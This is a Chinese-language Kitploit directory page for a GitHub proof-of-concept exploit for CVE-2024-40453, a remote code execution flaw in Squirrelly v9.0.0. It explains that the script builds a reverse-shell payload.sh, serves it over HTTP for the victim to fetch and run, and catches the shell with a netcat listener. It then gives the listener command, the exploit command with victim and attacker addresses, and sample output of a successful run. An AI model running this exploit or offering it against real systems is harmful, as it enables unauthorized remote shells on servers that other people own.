Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/bwithe/cve-2024-40453
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubbwithe/cve-2024-40453

CVE-2024-40453

CVE-2024-40453 - Squirrelly v9.0.0 RCE 漏洞。Poc

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-40453 - Squirrelly v9.0.0 RCE

免责声明:

本脚本仅供教育用途。

请勿将其用于非法目的。

如果用于非法目的,责任完全由使用者承担;本人不对任何滥用行为负责。

描述

该脚本会在当前目录下创建一个名为 payload.sh 的反向 Shell。

然后它在 80 端口上托管一个 HTTP 服务器,供受害者拉取 payload.sh。

攻击者机器上需要启动一个监听器。

HTTP 服务器会在 3 秒后关闭,以便受害者拉取并执行 payload.sh。

漏洞利用说明

基于以下信息,开发了此概念验证(POC)。 https://samuzora.com/posts/cve-2024-40453

用法

启动监听器

root@kitploit:~
rlwrap nc -nvlp 3000

执行载荷

root@kitploit:~
# python3 poc.py -rhost <VICTIM_IP> -rport <VICTIM_PORT> -lhost <ATTACKER_IP> -lport <ATTACKER_LISTENER_PORT>

python3 poc.py -rhost 172.16.0.2 -rport 3000 -lhost 172.16.0.1 -lport 3000
[+] Payload created at payload.sh
[*] Hosting HTTP server on port 80
[*] Triggering remote execution
172.16.0.2 - - [13/Jun/2025 22:21:10] "GET /payload.sh HTTP/1.1" 200 -
[*] Shutting down HTTP server on port 80
[!] Check your listener!

下载工具